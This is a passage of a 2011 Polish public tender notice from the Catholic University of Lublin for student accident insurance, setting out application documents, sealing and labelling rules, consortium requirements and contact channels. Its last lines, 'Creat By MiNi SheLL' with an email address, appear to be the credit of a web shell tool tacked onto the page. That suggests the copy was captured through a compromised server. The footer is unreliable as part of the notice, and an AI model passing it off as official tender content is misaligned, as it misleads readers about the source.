ustawy PZP - Załącznik nr 2
c) Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy PZP - Załącznik nr 3
d) Wykaz wykonanych lub także wykonywanych usług  - Załącznik nr 5
8. Doprecyzowanie pozostałych wymaganych dokumentów:
-  zgodnie z częścią III.4.1.1 Ogłoszenia o zamówieniu Zamawiający wymaga złożenia zezwolenie Ministerstwa Finansów na prowadzenie działalności ubezpieczeniowej we wszystkich grupach ryzyk objętych przedmiotem niniejszego zamówienia zgodnie z ustawą z dnia 22 maja 2003 r. o działalności ubezpieczeniowej (Dz. U. Nr 124, poz. 1151 ze zm.) 
9. Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem wniosku. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. 
10. Wniosek musi być podpisany przez osobę lub osoby do tego uprawnione. Jeżeli prawo do podpisania oferty nie wynika ze złożonych wraz ze wnioskiem dokumentów, Zamawiający wymaga dołączenia do wniosku pełnomocnictwa, z którego będzie jednoznacznie wynikało, do jakich czynności pełnomocnik jest upoważniony. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego powinni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego. 
11. W przypadku uczestnictwa w niniejszym postępowaniu spółki cywilnej, wniosek złożony przez nią musi być podpisana przez wszystkich członków spółki. Jeśli wniosek podpisuje jeden członek spółki , wraz z wnioskiem ma być załączone stosowne pełnomocnictwo albo umowa spółki cywilnej z której wynika sposób reprezentowania spółki.  
12. Wniosek przygotowany zgodnie z treścią ust. 1-11 będący jednym zbiorem trwale złączonych dokumentów i oświadczeń ma być spakowany w jedną zamkniętą, nieprzezroczystą kopertę lub inne zamknięte nieprzezroczyste opakowanie, które zapewni brak możliwości odczytania jego zawartości bez konieczności uszkodzenia tego opakowania. Na opakowaniu zewnętrznym oferty ma się znaleźć nazwa Wykonawcy i adres oraz nr telefonu lub faksu.  
13. W przypadku złożenia wniosku w niezamkniętym lub uszkodzonym opakowaniu, Zamawiający odbierając wniosek włoży go do opakowania i zamknie, aby z jego zawartością nie można było zapoznać się przed upływem terminu otwarcia wniosków.
14. Koperta lub inne opakowanie, o których mowa w ust. 11, mają być oznakowane wyraźnym i czytelnym napisem:
WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W POSTĘPOWANIU
NIE OTWIERAĆ PRZED 08.06.2011r. PRZED GODZ. 11:15
Usługa ubezpieczenia następstw nieszczęśliwych wypadków (NNW) studentów Katolickiego Uniwersytetu Lubelskiego Jana Pawła II w okresie od 01.10.2011 r. do 30.09.2013 r.
15. Wykonawca może wprowadzić zmiany oraz wycofać złożony przez siebie wniosek przed upływem terminu składania wniosków.  Zmiany, jakie we wniosku wprowadza Wykonawca należy nanieść czytelnie. Zmiany te muszą być podpisane przez osobę upoważnioną do podpisania wniosku.  
16. Dokumenty wymagane w niniejszym ogłoszeniu o zamówieniu,  muszą być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (Wykonawca - osoba upoważniona do jego reprezentowania składa na każdej zapisanej stronie kserokopii własnoręczny podpis opatrzony klauzulą za zgodność z oryginałem. Jeżeli do reprezentowania Wykonawcy upoważnione są dwie lub więcej osób, kserokopie dokumentów muszą być potwierdzone przez wszystkie te osoby.)  
17. Wnioski będą podlegać rejestracji. Każdy przyjęty wniosek zostanie oznakowany numerem zgodnym z kolejnością wpływu, datą wpływu oraz będzie na nim wpisana godzina i minuta, w której został przyjęty. Do czasu otwarcia wniosków wnioski będą przechowywane przez Zamawiającego w sposób gwarantujący ich nienaruszalność. 
18. Wszystkie wnioski, które Zamawiający otrzyma po terminie określonym w części IV.4.4) Ogłoszenia o zamówieniu zostaną niezwłocznie zwrócone, 
19. W sytuacji, kiedy Wykonawca zawrze w swoim wniosku informacje, które stanowią tajemnicę przedsiębiorstwa zgodnie z przepisami o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien zastrzec, które z informacji zawartych w ofercie stanowią tajemnicę przedsiębiorstwa. Zgodnie z art. 86 ust. 4 ustawy Wykonawca nie może zastrzec informacji podawanych podczas otwarcia ofert tj. nazwa(firma), adres wykonawcy, informacje dotyczące ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie. Sposób wskazania tych informacji nie może budzić wątpliwości. Informacje stanowiące tajemnicę przedsiębiorstwa mają być trwale złączone ze sobą, ponumerowane w kolejności zgodnej z numeracją oferty i spakowane w odrębną wewnętrzną, nieprzezroczystą kopertę, która ma być oznakowana napisem Informacje stanowiące tajemnicę przedsiębiorstwa.
II. Dodatkowe informacje dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego na podstawie art. 23 ustawy Pzp
1. Zgodnie z art. art. 24 ust. 1 i ust. 2 ustawy Pzp żaden z Wykonawców występujących wspólnie nie może podlegać wykluczeniu z postępowania.  
2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3. Treść pełnomocnictwa musi dokładnie określać zakres umocowania. W treści pełnomocnictwa muszą być wymienione nazwy, adresy siedziby, imię i nazwisko przedsiębiorcy lub zarządu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Z treści pełnomocnictwa musi również jednoznacznie wynikać, który z Wykonawców będzie występował w roli pełnomocnika. Pełnomocnictwo musi być podpisane przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, w tym Wykonawcę pełniącego funkcję pełnomocnika (lidera). Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawców. 
4. W przypadku wyboru oferty Wykonawców występujących wspólnie, przed podpisaniem umowy  Wykonawcy występujący wspólnie muszą zawiązać konsorcjum oraz zawrzeć umowę w której zostaną określone prawa i obowiązki poszczególnych przedsiębiorców wchodzących w skład Konsorcjum. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. 
5. Dokumenty składane wraz z wnioskiem mają być w oryginale lub w formie kserokopii poświadczonej za zgodność z oryginałem. Jeżeli przedstawiona kserokopia dokumentu będzie budziła  uzasadnione wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginału dokumentu lub notarialnie poświadczonej kopii. 
6. Wykonawca zgodnie z art. 26 ust. 2b ustawy Pzp może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
II. Informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami 
1. Adres strony internetowej, na której zamieszczone jest ogłoszenie o zamówieniu oraz wzory dokumentów, z których Wykonawca powinien korzystać sporządzając wniosek o udzielenie niniejszego zamówienia to: www.kul.lublin.pl/1650.html.
2. Postępowanie o udzielenie zamówienia publicznego prowadzone jest z zachowaniem formy pisemnej, z zastrzeżeniem wyjątków określonych w ustawie Pzp. 
3. W niniejszym postępowaniu wszelkie oświadczenia, zapytania, wnioski, zawiadomienia, wezwania, wyjaśnienia oraz inne informacje należy przekazywać pisemnie faksem na numer (0-81)445-41-63 lub drogą elektroniczną na adres dzp@kul.pl wraz z podaniem numeru postępowania  AZP-240/PN-p14/019/2011.
4. Fakt otrzymania oświadczeń, zapytań, wniosków, zawiadomień, wezwań, wyjaśnień oraz innych informacji przesłanych faksem lub drogą elektroniczną ma być potwierdzony przez każdą ze stron w takiej formie w jakiej strona je otrzymała.
5. Zamawiający żąda od Wykonawcy potwierdzenia otrzymania  informacji w każdym przypadku, bez względu na rodzaj i formę dokumentu. 
6. Zamawiający zastrzega, że uzna, iż dokumenty o których mowa w pkt 4 złożone drogą elektroniczną lub faksem zostały wniesione w terminie pod warunkiem niezwłocznego ich potwierdzenia przez drugą stronę, zgodnie z art. 27 ust. 2 ustawy pzp. 
7. W przypadku odwołań oraz przystąpień do odwołań jedyną dopuszczalną formą porozumiewania się jest forma pisemna przesłana faksem oraz dodatkowo przesłana drogą pocztową za zwrotnym potwierdzeniem odbioru. 
8. Cała korespondencja  (tj. oświadczenia, zapytania, wnioski, zawiadomienia, wezwania, wyjaśnienia  inne informacje) w przypadku Wykonawców występujących wspólnie będzie adresowana do podmiotu wyznaczonego na pełnomocnika ze skutkiem wobec wszystkich Wykonawców  występujących wspólnie. 
9. Zamawiający nie zamierza zwoływać  zebrania wszystkich Wykonawców o którym mowa w art. 38 ust. 3 ustawy Pzp.
10. Osoby uprawnione do porozumiewania się z Wykonawcami: 
W zakresie spraw merytorycznych związanych z przedmiotem zamówienia: 
MENTOR S.A. broker ubezpieczeniowy Leonard Pilipczuk fax (081) 533-39-32  e-mail: mentorlu@mentor.pl, wyłącznie, w dni robocze w godz. 8:00 - 14:00.
W zakresie zagadnień formalno-prawnych  związanych z przedmiotem zamówienia: 
Katarzyna Stępniak, fax (0-81) 445-41-63, e-mail: dzp@kul.pl, Dział Zamówień i Zaopatrzenia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com